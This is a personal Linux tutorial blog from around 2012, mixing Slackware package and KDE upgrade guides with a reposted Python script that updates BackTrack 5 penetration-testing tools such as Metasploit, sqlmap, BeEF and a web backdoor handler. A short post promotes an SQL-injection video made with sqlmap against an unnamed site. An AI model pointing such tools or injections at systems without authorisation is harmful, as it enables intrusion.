Linux Terminal 101: How to View Processes
Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts
Friday, February 15, 2013
Monday, January 21, 2013
Linux Terminal 101: How to Use Permissions
Permissions exist for Linux computers so more than one person can use a
machine at one time and only be allowed to do certain things.
Thursday, December 20, 2012
Useful slapt-get commands
Please refer to the documentation for slapt-get: man slapt-get, the HOWTOs
at the VL Forum: slapt-get basics and gslapt basics or go to the slapt-get
FAQ site for more advanced topics.
You may wish to try some of these slapt-get commands:
-
to list all the available packages from the source repository:
slapt-get --available -
to list only those packages that you have already installed:
slapt-get --installed -
to search the listings for specific package(s):
slapt-get --search [packagename(s)] -
to install (or to upgrade an already installed) package(s):
slapt-get --install [packagename(s)] -
to remove packages(s):
slapt-get --remove [packagename(s)] -
to clear your temp directory of downloaded packages:
slapt-get --clean -
to show a package(s) description:
slapt-get --show [package(s)] -
to reinstall an existing package:
slapt-get --reinstall --install [package] -
to downgrade a package:
slapt-get --reinstall --install [exactpackagenameandnumbers] -
to show a sorted, paged list of available packages from the source repository:
slapt-get —available | sort | less
-
to show a sorted, paged list of installed packages on your system:
slapt-get --installed|sort|less -
to show a sorted, paged list of available, uninstalled packages:
slapt-get --available|grep inst=no|sort|less -
to show only available packages related to e.g. fluxbox:
slapt-get --available|grep fluxbox -
to show only available, uninstalled packages specifically packaged for VL5:
slapt-get --available|grep inst=no|grep vl5|sort|less -
to install all packages pertaining to e.g. fluxbox:
slapt-get --available|grep fluxbox|awk '{print $1}'|sort|uniq|xargs -r slapt-get --install -
to install every available package not yet installed (DANGER!):
slapt-get --available|grep inst=no|awk '{print $1}'|sort|uniq|xargs -r slapt-get --installsouce link : http://xpt.sourceforge.net/techdocs/nix/live/slax/slax02-SlackwarePackagesRepositories/single/
Wednesday, December 19, 2012
Upgrade KDE to 4.9.4 Slackware 14 64bit
KDE4.9
======
This is the KDE Software Compilation 4.9.4 for Slackware 14 and later.
You have to run Slackware 14 in order to use these packages!
The upgrade from Slackware's own 4.8.5 will be trivial. I added five
updated dependencies (akonadi, qt, soprano, shared-desktop-ontologies and
virtuoso-ose). One of those dependencies has been updated since my previous
KDE 4.9.3 packages: qt.
I updated several 'extragear' packages compared to Slackware 14, and two of
those are all new: kdevelop, kdevplatform, oxygen-gtk2, oxygen-gtk3
and kio-mtp.
Two KDE packages have been removed since the KDE 4.8.5 of Slackware 14:
* kdemultimedia has been split up into several smaller individual packages.
* ksecrets has been removed completely in the 4.9.x series.
NOTE:
* Possible issue when rebuilding these packages on 13.37: the new kwin
requires at least mesa-7.10 and this is not installed by default.
Slackware 13.37 has mesa-7.10.2 in the /testing directory though. Use that.
It looks like KDE 4.9.x is the last series which will actually build on 13.37.
NOTE:
About the language packs (KDEI) - for Slackware 32-bit as well as 64-bit:
* KDE localizations (language packs) are available in "x86_64/kdei". You only
need one package (for your own language). Don't let the "x86_64" in the
directory name fool you, the language packs are useable on both platforms.
translations/localizations.
NOTE:
Sources and scripts have been separated from the packages in my 'ktown
repository starting with KDE 4.9-rc1. If you want the sources for
4.9.4, run the following command to download them:
# rsync -av rsync://alien.slackbook.org/alien/ktown/source/4.9.4 .
-------------------------------------------------------------------------------
Below are the steps you need to take to install or upgrade to KDE 4.9.4.
Make sure you are not running KDE or even X ! If you are running an X session,
log out first, and if you are in runlevel 4 (graphical login) you first have to
go back to runlevel 3 (console) by typing "init 3".
To make it easy for you, here is a one-line command that downloads the whole
4.9.4 directory (excluding the sources), with 32-bit and 64-bit packages
(and be careful of the 'dot' at the end of that command, it is part of the
commandline !!):
# rsync -av rsync://alien.slackbook.org/alien/ktown/14.0/4.9.4 .
Or else, if you want to download packages for just one of the two supported
architectures, you would run one of the following commands instead.
If you want only the 64-bit packages:
# rsync -av --exclude=x86 rsync://alien.slackbook.org/alien/ktown/14.0/4.9.4 .
If you want only the 32-bit packages:
# rsync -av --exclude=x86_64 rsync://alien.slackbook.org/alien/ktown/14.0/4.9.4 .
OK. Assuming you just downloaded the bits you want from directory tree "4.9.4"
and below that, you now change your current directory to where you found
this README (which is the directory called '4.9.4'). If you used one of the
above "rsync" commands then that would mean a simple:
# cd 4.9.4
From within this directory, you run the following commands as root. Note that
some of the old KDE package names are obsoleted too, they have been split up,
renamed or integrated:
On Slackware 32-bit:
# upgradepkg --reinstall --install-new x86/deps/*.t?z
# upgradepkg --reinstall --install-new x86/kde/*.t?z
# removepkg kdemultimedia
# removepkg ksecrets
On Slackware 64-bit:
# upgradepkg --reinstall --install-new x86_64/deps/*.t?z
# upgradepkg --reinstall --install-new x86_64/kde/*.t?z
# removepkg kdemultimedia
# removepkg ksecrets
If you already have one or more non-english language packs installed:
# upgradepkg x86_64/kdei/*.t?z
If you want to have a non-english language pack installed but none is
currently installed, substitute your country code instead of the 'XX'
in the next command:
# upgradepkg --install-new x86_64/kdei/kde-l10n-XX-*.t?z
Check if any ".new" configuration files have been left behind by
the upgradepkg commands. Compare them to their originals and decide
if you need to use them.
# find /etc/ -name "*.new"
A graphical (ncrses) tool for processing these "*.new" files is slackpkg:
# slackpkg new-config
Then reboot your system.
===============================================================================
Eric Hameleers - alien at slackware dot com - 04dec012
souce link : http://repo.ukdw.ac.id/alien-kde/14.0/4.9.4/
Tuesday, December 18, 2012
Command : Locate error ? | Slackware 14
root@darkstar:/# locate gslapt
locate: fatal error: Could not find user database '/var/lib/slocate/slocate.db': No such file or directory
nah solusinya mudah :
ketikkan pada terminal :
#updatedb
tunggu hingga selesai. Dan coba lagi command locate nya :D
mudah2an informasi ringan ini dapat membantu para pemula slackware 14 dalam mengatasi masalah ini.
salam
gr33nc0d3
locate: fatal error: Could not find user database '/var/lib/slocate/slocate.db': No such file or directory
nah solusinya mudah :
ketikkan pada terminal :
#updatedb
tunggu hingga selesai. Dan coba lagi command locate nya :D
mudah2an informasi ringan ini dapat membantu para pemula slackware 14 dalam mengatasi masalah ini.
salam
gr33nc0d3
Cara Install VLC di Slackware 14 64bit
Sesuai dengan judul di atas ... maka dibawah ini adalah langkah2nya :
1. Download file dari:
#wget http://www.slackware.com/~alien/slackbuilds/vlc/pkg64/14.0/vlc-2.0.5-x86_64-1alien.txz
2. Setelah selesai download
#upgradepkg --install-new vlc-2.0.5-x86_64-1alien.txz
Mudah bukan? bagi yang sudah expert sebagai reminder saja ...
1. Download file dari:
#wget http://www.slackware.com/~alien/slackbuilds/vlc/pkg64/14.0/vlc-2.0.5-x86_64-1alien.txz
2. Setelah selesai download
#upgradepkg --install-new vlc-2.0.5-x86_64-1alien.txz
Mudah bukan? bagi yang sudah expert sebagai reminder saja ...
Monday, December 17, 2012
Installation of flash player for Slackware 14 64bit
Bagi pengguna Slackware 14 64bit yang ingin meng-install flashplayer untuk Mozilla, mudah2an tutorial singkat ini bisa membantu temen2/pengunjung setia blog saya ini.
1. Download Flash-player-plugins di :
# wget http://slackbuilds.org/slackbuilds/14.0/multimedia/flash-player-plugin.tar.gz
2. Download juga Installer nya di :
#wget http://fpdownload.macromedia.com/get/flashplayer/pdc/11.2.202.243/install_flash_player_11_linux_x86_64.tar.gz
3. Extract file Flash-player-plugins nya
# tar -xf flash-player-plugin.tar.gz
4. Masuk dalam folder flash-player-plugin
#cd flash-player-plugin
5. Ketikkan baris perintah berikut :
#doinst.sh flash-player-plugin.info slack-desc
6. Copy File install_flash_player_11_linux_x86_64.tar.gz kedalam folder flash-player-plugin
#cp /download/install_flash_player_11_linux_x86_64.tar.gz /download/flash-player-plugin
** dlm hal ini contoh foldernya ada dalam folder download
7. Teruskan dengan perintah dibawah ini :
#sh flash-player-plugin.SlackBuild
dan tunggu hingga proses "build " selesai :
Hasil BUILD tadi tersimpan dalam :
/tmp/flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz
9. Langkah terkahir :
#installpkg /tmp/flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz
Tunggu hingga selesai. Contoh seperti dibawah ini :
1. Download Flash-player-plugins di :
# wget http://slackbuilds.org/slackbuilds/14.0/multimedia/flash-player-plugin.tar.gz
2. Download juga Installer nya di :
#wget http://fpdownload.macromedia.com/get/flashplayer/pdc/11.2.202.243/install_flash_player_11_linux_x86_64.tar.gz
3. Extract file Flash-player-plugins nya
# tar -xf flash-player-plugin.tar.gz
4. Masuk dalam folder flash-player-plugin
#cd flash-player-plugin
5. Ketikkan baris perintah berikut :
#doinst.sh flash-player-plugin.info slack-desc
6. Copy File install_flash_player_11_linux_x86_64.tar.gz kedalam folder flash-player-plugin
#cp /download/install_flash_player_11_linux_x86_64.tar.gz /download/flash-player-plugin
** dlm hal ini contoh foldernya ada dalam folder download
7. Teruskan dengan perintah dibawah ini :
#sh flash-player-plugin.SlackBuild
dan tunggu hingga proses "build " selesai :
Slackware package maker, version 3.14159.8. Perhatikan baris terakhir diatas yang telah diberi effect cetak tebal
Searching for symbolic links:
usr/share/pixmaps/flash-player-properties.png -> ../icons/hicolor/48x48/apps/flash-player-properties.png
Making symbolic link creation script:
( cd usr/share/pixmaps ; rm -rf flash-player-properties.png )
( cd usr/share/pixmaps ; ln -sf ../icons/hicolor/48x48/apps/flash-player-properties.png flash-player-properties.png )
Unless your existing installation script already contains the code
to create these links, you should append these lines to your existing
install script. Now's your chance. :^)
Would you like to add this stuff to the existing install script and
remove the symbolic links ([y]es, [n]o)? y
Removing symbolic links:
removed './usr/share/pixmaps/flash-player-properties.png'
Updating your ./install/doinst.sh (prepending symlinks)...
This next step is optional - you can set the directories in your package
to some sane permissions. If any of the directories in your package have
special permissions, then DO NOT reset them here!
Would you like to reset all directory permissions to 755 (drwxr-xr-x) and
directory ownerships to root.root ([y]es, [n]o)? n
Creating Slackware package: /tmp/flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz
./
install/
install/doinst.sh
install/slack-desc
usr/
usr/bin/
usr/bin/flash-player-properties
usr/share/
usr/share/applications/
usr/share/applications/flash-player-properties.desktop
usr/share/pixmaps/
usr/share/icons/
usr/share/icons/hicolor/
usr/share/icons/hicolor/22x22/
usr/share/icons/hicolor/22x22/apps/
usr/share/icons/hicolor/22x22/apps/flash-player-properties.png
usr/share/icons/hicolor/48x48/
usr/share/icons/hicolor/48x48/apps/
usr/share/icons/hicolor/48x48/apps/flash-player-properties.png
usr/share/icons/hicolor/32x32/
usr/share/icons/hicolor/32x32/apps/
usr/share/icons/hicolor/32x32/apps/flash-player-properties.png
usr/share/icons/hicolor/16x16/
usr/share/icons/hicolor/16x16/apps/
usr/share/icons/hicolor/16x16/apps/flash-player-properties.png
usr/share/icons/hicolor/24x24/
usr/share/icons/hicolor/24x24/apps/
usr/share/icons/hicolor/24x24/apps/flash-player-properties.png
usr/share/kde4/
usr/share/kde4/services/
usr/share/kde4/services/kcm_adobe_flash_player.desktop
usr/lib64/
usr/lib64/mozilla/
usr/lib64/mozilla/plugins/
usr/lib64/mozilla/plugins/libflashplayer.so
usr/lib64/kde4/
usr/lib64/kde4/kcm_adobe_flash_player.so
usr/doc/
usr/doc/flash-player-plugin-11.2.202.243/
usr/doc/flash-player-plugin-11.2.202.243/flash-player-plugin.SlackBuild
usr/doc/flash-player-plugin-11.2.202.243/readme.txt
Slackware package /tmp/flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz created
Hasil BUILD tadi tersimpan dalam :
/tmp/flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz
9. Langkah terkahir :
#installpkg /tmp/flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz
Tunggu hingga selesai. Contoh seperti dibawah ini :
Verifying package flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz.
Installing package flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz:
PACKAGE DESCRIPTION:
# flash-player-plugin (flash plugin for web browsers)
#
# Provides Adobe Flash plugin for browsers that recognize
# /usr/lib(64)/mozilla/plugins as a valid plugin directory
#
# Plugin is subject to Adobe terms of use:
# https://www.adobe.com/misc/terms.html
#
Executing install script for flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz.
Package flash-player-plugin-11.2.202.243-x86_64-2_SBo.tgz installed.
Tuesday, December 11, 2012
Backtrack 5 Update Python code
Bagi teman-teman yang mengalami kesulitan dalam meng-update system/tools di Backtrack 5 ... copy-paste script dibawah ini dan simpan dengan "nama apa saja".py ... contoh : btupdate.py
#!/usr/bin/python
# Update script for Backtrack 5 R2/R3.
# Author: sickness
# Thanks goes to: g0tmi1k
# #########################################
#
# Depending on how you run the script it may cause issues with your Backtrack installation.
# DO NOT RUN IT UNLESS YOU KNOW WHAT YOU ARE DOING.
# Further more I am not responsable if your Backtrack OS starts encountering issues.
#
###########################################
# Imports
import sys, urllib2, subprocess, argparse, os
from time import sleep
from argparse import RawTextHelpFormatter
GREEN = '\033[92m'
END = '\033[0m'
RED = '\033[31m'
# Update Functions
def internet_check():
try:
urllib2.urlopen("http://www.google.com", timeout=1)
print "\n"
print GREEN + "[>] Internet connection: available!" + END
sleep(0.1)
except:
print "\n"
print RED + "[>] Internet connection: unavailable!" + END
sys.exit()
def backtrack_update():
print GREEN + "[>] Updating & cleaning Backtrack, please wait...\n" + END
if subprocess.Popen("ls -l /pentest/web/scanners/ 2>/dev/null | grep -q 0", shell=True).wait() == 0:
subprocess.Popen("rm -rf /pentest/web/scanners/", shell=True).wait()
if subprocess.Popen("apt-get update && apt-get -y dist-upgrade", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Backtrack updated & cleaned successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Backtrack\n" + END
sleep(2)
def exploit_db():
print GREEN + "[>] Updating Exploit-DB, please wait...\n" + END
if subprocess.Popen("cd /pentest/exploits/exploitdb/ && svn update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Exploit-DB updated successfully!" + END
else:
print RED + "[>] Exploit-DB's SVN didn't work. Updating manually. Please wait...\n" + END
if subprocess.Popen("wget http://www.exploit-db.com/archive.tar.bz2", shell=True).wait() == 0:
subprocess.Popen("tar xvfj archive.tar.bz2 > /dev/null", shell=True).wait()
subprocess.Popen("rm -rf /pentest/exploits/exploitdb/platforms/", shell=True).wait()
subprocess.Popen("mv -f platforms/ files.csv /pentest/exploits/exploitdb/", shell=True).wait()
subprocess.Popen("rm -rf archive.tar.bz2*", shell=True).wait()
print "\n"
print GREEN + "[>] Exploit-DB updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Exploit-DB\n" + END
sleep(2)
def s_e_t():
print GREEN + "[>] Updating SET, please wait...\n" + END
if subprocess.Popen("cd /pentest/exploits/set/ && ./set-update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] SET updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update SET\n" + END
sleep(2)
def warvox():
print RED + "[>] The following software has been completely integrated within Metasploit, update might fail!" + END
print GREEN + "[>] Updating Warvox, please wait...\n" + END
if subprocess.Popen("cd /pentest/telephony/warvox/ && svn update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Warvox updated successfully!" + END
elif subprocess.Popen("apt-get remove warvox -y && rm -rf /pentest/telephony/warvox/ && svn checkout http://www.metasploit.com/svn/warvox/trunk/ /pentest/telephony/warvox/", shell=True).wait() == 0:
#elif subprocess.Popen("svn checkout http://www.metasploit.com/svn/warvox/trunk/ /pentest/telephony/warvox/", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Warvox updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Warvox\n" + END
sleep(2)
def giskismet():
print GREEN + "[>] Updating Giskismet, please wait...\n" + END
if subprocess.Popen("cd /pentest/wireless/giskismet/ && svn update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Giskismet updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Giskismet\n" + END
sleep(2)
def dedected():
print GREEN + "[>] Updating Dedected, please wait...\n" + END
if subprocess.Popen("cd /pentest/telephony/dedected/ && svn update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Dedected updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Dedected\n" + END
sleep(2)
def msf():
print GREEN + "[>] Updating Metasploit, please wait...\n" + END
if subprocess.Popen("msfupdate", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Metasploit updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Metasploit\n" + END
sleep(2)
def w3af():
print GREEN + "[>] Updating W3AF, please wait...\n" + END
if subprocess.Popen("cd /pentest/web/w3af/ && svn update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] W3AF updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update W3AF\n" + END
sleep(2)
def nikto():
print RED + "[>] The following software hasn't been updated for an extensive period of time, update might fail!" + END
print GREEN + "[>] Updating Nikto, please wait...\n" + END
if subprocess.Popen("cd /pentest/web/nikto/ && ./nikto.pl -update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Nikto updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Nikto\n" + END
sleep(2)
def fasttrack():
print GREEN + "[>] Updating Fast-track, please wait...\n" + END
if subprocess.Popen("cd /pentest/exploits/fasttrack/ && ./fast-track.py -c 1", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Fast-track updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Fast-track\n" + END
sleep(2)
def pyrit():
print GREEN + "[>] Checking to see if Pyrit is installed" + END
if subprocess.Popen("pyrit > /dev/null", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Pyrit installed!" + END
else:
print GREEN + "[>] Installing Pyrit, please wait...\n" + END
subprocess.Popen("apt-get -y install libssl-dev scapy python-dev", shell=True).wait()
subprocess.Popen("svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn", shell=True).wait()
subprocess.Popen("cd pyrit_svn/pyrit && python setup.py build && python setup.py install", shell=True).wait()
subprocess.Popen("rm -rf pyrit_svn", shell=True).wait()
print "\n"
print GREEN + "[>] Pyrit installed successfully!" + END
sleep(2)
def nmap():
print GREEN + "[>] Updating Nmap (OS fingerprinting), please wait...\n" + END
if subprocess.Popen("wget http://nmap.org/svn/nmap-os-db -O /usr/local/share/nmap/nmap-os-db", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Nmap fingerprint updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update nmap fingerprint\n" + END
sleep(2)
print GREEN + "[>] Updating Nmap (scripting engine), please wait...\n" + END
if subprocess.Popen("nmap -script-updatedb", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Nmap scripting engine updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update nmap scripting engine\n" + END
sleep(2)
def fimap():
print GREEN + "[>] Updating Fimap & installing MSF plugin, please wait...\n" + END
if subprocess.Popen("cd /pentest/web/fimap/ && ./fimap.py --update-def", shell=True).wait() == 1:
print "\n"
print GREEN + "[>] Fimap updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Fimap\n" + END
sleep(2)
def wpscan():
print GREEN + "[>] Updating WPScan, please wait...\n" + END
if subprocess.Popen("find /root/.gem/ruby/*/bin/ -name nokogiri | egrep '.*' > /dev/null", shell=True).wait() == 1: #gem list nokogiri | grep -q nokogiri
print GREEN + "[>] Installing the required ruby gem, please wait...\n" + END
if subprocess.Popen("gem install --user-install nokogiri", shell=True).wait() == 0:
print GREEN + "[>] Ruby gem installed successfully!" + END
else:
print RED + "[>] Failed to install ruby gem\n" + END
if subprocess.Popen("cd /pentest/web/wpscan/ && ./wpscan.rb --update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] WPScan updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update WPScan\n" + END
sleep(2)
def joomscan():
print GREEN + "[>] Updating JoomScan, please wait...\n" + END
if subprocess.Popen("cd /pentest/web/joomscan/ && perl joomscan.pl update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] JoomScan updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update JoomScan\n" + END
sleep(2)
def sqlmap():
print GREEN + "[>] Updating SQLMap, please wait...\n" + END
if subprocess.Popen("cd /pentest/database/sqlmap/ && python sqlmap.py --update", shell=True).wait() == 1:
print "\n"
print GREEN + "[>] SQLMap updated successfully!" + END
elif subprocess.Popen("cd /pentest/database/sqlmap/ && ./sqlmap.py --update", shell=True).wait() == 1: # svn update
print "\n"
print GREEN + "[>] SQLMap updated successfully!" + END
#elif subprocess.Popen("apt-get remove sqlmap && rm -rf /pentest/database/sqlmap/ && svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap /pentest/database/sqlmap/", shell=True).wait() == 1:
elif subprocess.Popen("svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap /pentest/database/sqlmap/", shell=True).wait() == 1:
print "\n"
print GREEN + "[>] SQLMap updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update SQLMap\n" + END
sleep(2)
def hexorbase():
print GREEN + "[>] Updating HexorBase please wait...\n" + END
if subprocess.Popen("cd /pentest/database/hexorbase/ && svn update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] HexorBase updated successfully!" + END
#elif subprocess.Popen("apt-get remove hexorbase && rm -rf /pentest/database/hexorbase/ && svn checkout http://hexorbase.googlecode.com/svn/ /pentest/database/hexorbase/", shell=True).wait() == 1:
elif subprocess.Popen("svn checkout http://hexorbase.googlecode.com/svn/ /pentest/database/hexorbase/", shell=True).wait() == 1:
print "\n"
print GREEN + "[>] HexorBase updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update HexorBase\n" + END
sleep(2)
def sqlninja():
print GREEN + "[>] Updating SQLNinja, please wait...\n" + END
if subprocess.Popen("apt-get remove sqlninja -y && rm -rf /pentest/database/sqlninja && svn co https://sqlninja.svn.sourceforge.net/svnroot/sqlninja /pentest/database/sqlninja", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] SQLNinja updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update SQLNinja\n" + END
sleep(2)
def openvas():
print GREEN + "[>] Updating OpenVAS, please wait...\n" + END
if subprocess.Popen("openvas-nvt-sync", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] OpenVAS updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update OpenVAS\n" + END
sleep(2)
def aircrack():
print GREEN + "[>] Updating AirCrack-NG & Airodump, please wait...\n" + END
subprocess.Popen("apt-get install libssl-dev", shell=True).wait()
if subprocess.Popen("cd /pentest/wireless/aircrack-ng/ && svn update", shell=True).wait() == 0:
subprocess.Popen("cd /pentest/wireless/aircrack-ng/scripts/ && chmod a+x airodump-ng-oui-update && ./airodump-ng-oui-update", shell=True).wait()
print "\n"
print GREEN + "[>] AirCrack-NG & Airodump updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update AirCrack-ng\n" + END
sleep(2)
def webhandler():
print GREEN + "[>] Updating WebHandler, please wait...\n" + END
if subprocess.Popen("cd /pentest/backdoors/web/webhandler/ && python webhandler.py --update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] WebHandler updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update WebHandler\n" + END
sleep(2)
def beef():
print GREEN + "[>] Updating BeEF, please wait...\n" + END
if subprocess.Popen("cd /pentest/web/beef/ && ./update-beef", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] BeEF updated successfully!" + END
else:
print RED + "[>] Unable to update BeEF normally. Downloading a fresh copy, please wait...\n" + END
if subprocess.Popen("mv -f /pentest/web/beef{,_old} && cd /pentest/web/ && git clone git://github.com/beefproject/beef.git && cd /pentest/web/beef/ && ./update-beef", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] BeEF updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update BeEF\n" + END
sleep(2)
def wifite():
print GREEN + "[>] Updating WiFite, please wait...\n" + END
if subprocess.Popen("cd /pentest/wireless/wifite/ && python wifite.py -upgrade", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] WiFite updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update WiFite\n" + END
sleep(2)
def nessus():
if subprocess.Popen("ls -l /etc/init.d/nessusd 2>/dev/null | grep -q 0", shell=True).wait() == 0:
print GREEN + "[>] Updating Nessus, please wait...\n" + END
nessusrunning = False
if subprocess.Popen("ps -A | grep nessus > /dev/null", shell=True).wait() == 0:
nessusrunning = True
if subprocess.Popen("/etc/init.d/nessusd start && sleep 10 && nessus-update-plugins", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Nessus updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Nessus\n" + END
sleep(2)
if nessusrunning == False:
subprocess.Popen("/etc/init.d/nessusd stop", shell=True).wait()
else:
print RED + "[>] You do not have Nessus installed. Skipping...\n" + END
def fernwificracker():
print GREEN + "[>] Updating Fern WIFI Cracker, please wait...\n" + END
if subprocess.Popen("cd /pentest/wireless/fern-wifi-cracker/ && svn update", shell=True).wait() == 0:
print "\n"
print GREEN + "[>] Fern WIFI Cracker updated successfully!" + END
else:
print "\n"
print RED + "[>] Failed to update Fern WIFI Cracker\n" + END
sleep(2)
def system():
backtrack_update()
def tools():
exploit_db()
s_e_t ()
warvox()
giskismet()
dedected()
msf()
w3af()
nikto()
fasttrack()
pyrit()
nmap()
fimap()
wpscan()
joomscan()
sqlmap()
hexorbase()
sqlninja()
openvas()
aircrack()
webhandler()
beef()
wifite()
nessus()
fernwificracker()
def all():
system()
tools()
def tryharder():
print "\n"
print RED + "[>] Wrong choice, possible choices are: system, tools, all\n" + END
def complete():
print GREEN + "[>] Cleaning up, please wait...\n" + END
subprocess.Popen("rm -f /root/fimap.log", shell=True).wait()
subprocess.Popen("apt-get -y autoremove && apt-get -y clean", shell=True).wait()
print GREEN + "[>] Cleaned successfully!" + END
print "\n"
print GREEN + "[>] Backtrack update completed successfully!\n" + END
sys.exit()
# Main
if __name__ == "__main__":
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, description='''[>] Update script for Backtrack 5 R2/R3\n[>] Author: sickness \n[>] Version: 2.0''')
parser.add_argument('--update', help="Select what to update: system, tools, all")
args = parser.parse_args()
if len(sys.argv) > 4:
parser.print_help()
sys.exit()
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
internet_check()
if args.update == "system":
system()
complete()
elif args.update == "tools":
tools()
complete()
elif args.update == "all":
all()
complete()
else:
tryharder()
Sunday, December 9, 2012
Copy File dari Partisi Linux - Backtrack 5
The ext3 or third extended filesystem is a journaled file system that is
commonly used by the Linux kernel. It is the default file system for
many popular Linux distributions.
The ext4 or fourth extended filesystem is a journaling file system for Linux, developed as the successor to ext3.
It was born as a series of backward compatible extensions to remove 64-bit storage limits and add other performance improvements to ext3.However, other Linux kernel developers opposed accepting extensions to ext3 for stability reasons and proposed to fork the source code of ext3, rename it as ext4, and do all the development there, without affecting the current ext3 users
Ext2Read is an explorer like utility to explore ext2/ext3/ext4 files. It now supports LVM2 and EXT4 extents. It can be used to view and copy files and folders. It can recursively copy entire folders. It can also be used to view and copy disk and file
You can download Ext2Read from here
Screenshot
Ext2Fsd is an ext2 file system driver for Windows 2000, XP, Vista. It’s a free software and everyone can distribute and modify it under GPL2.
Procedure o follow
Important Note:- When creating/formatting the ext4 filesystem, make sure to add “-O ^extent” which means disabling the “extent” feature bit. The following steps will not work if your ext4 filesystem still has “extent” feature enabled. ext2 and ext3 partitions should be fine.
First Download ext2fsd from here
Right-click the downloaded file and click Properties. Set the compatibility mode to “Windows Vista Service Pack 2? and check “Run as administrator”.
Run the ext2fsd installer. During install, we recommend you uncheck the “enable write access” feature to safeguard against losing data in your Linux partitions.
Restart your Windows 7 PC and run the Ext2 Volume Manager from Start Menu.
Important Note:- Use these tools with your own risk if you don't use them properly it will remove your linux partition data
If you have any other tools to do this you share with us.
source link : http://www.ubuntugeek.com/how-to-read-ext3ext4-linux-partition-from-windows-7.html
The ext4 or fourth extended filesystem is a journaling file system for Linux, developed as the successor to ext3.
It was born as a series of backward compatible extensions to remove 64-bit storage limits and add other performance improvements to ext3.However, other Linux kernel developers opposed accepting extensions to ext3 for stability reasons and proposed to fork the source code of ext3, rename it as ext4, and do all the development there, without affecting the current ext3 users
Ext2Read is an explorer like utility to explore ext2/ext3/ext4 files. It now supports LVM2 and EXT4 extents. It can be used to view and copy files and folders. It can recursively copy entire folders. It can also be used to view and copy disk and file
You can download Ext2Read from here
Screenshot
Ext2Fsd is an ext2 file system driver for Windows 2000, XP, Vista. It’s a free software and everyone can distribute and modify it under GPL2.
Procedure o follow
Important Note:- When creating/formatting the ext4 filesystem, make sure to add “-O ^extent” which means disabling the “extent” feature bit. The following steps will not work if your ext4 filesystem still has “extent” feature enabled. ext2 and ext3 partitions should be fine.
First Download ext2fsd from here
Right-click the downloaded file and click Properties. Set the compatibility mode to “Windows Vista Service Pack 2? and check “Run as administrator”.
Run the ext2fsd installer. During install, we recommend you uncheck the “enable write access” feature to safeguard against losing data in your Linux partitions.
Restart your Windows 7 PC and run the Ext2 Volume Manager from Start Menu.
Important Note:- Use these tools with your own risk if you don't use them properly it will remove your linux partition data
If you have any other tools to do this you share with us.
source link : http://www.ubuntugeek.com/how-to-read-ext3ext4-linux-partition-from-windows-7.html
SQL Injection using sqlmap.py by myself
Video Tutorial ini hanyalah untuk bahan pembelajaran saja, tidak ada yang rusak/dirusak dalam contoh domain dalam video...jika anda suka, LIKE this video tutorial plz :D
This video tutorial just wanna show you how to use sqlmap.py ... no harm with the example domain/target inside this video .... just for education purposed ....
if you like it ... rate my video :D
visit my blog at http://gr33nc0d3-info.blogspot.com ;... just a simple blog ...
Thursday, December 6, 2012
Hak5 1216.2, Android Hacking with the USB Rubber Ducky
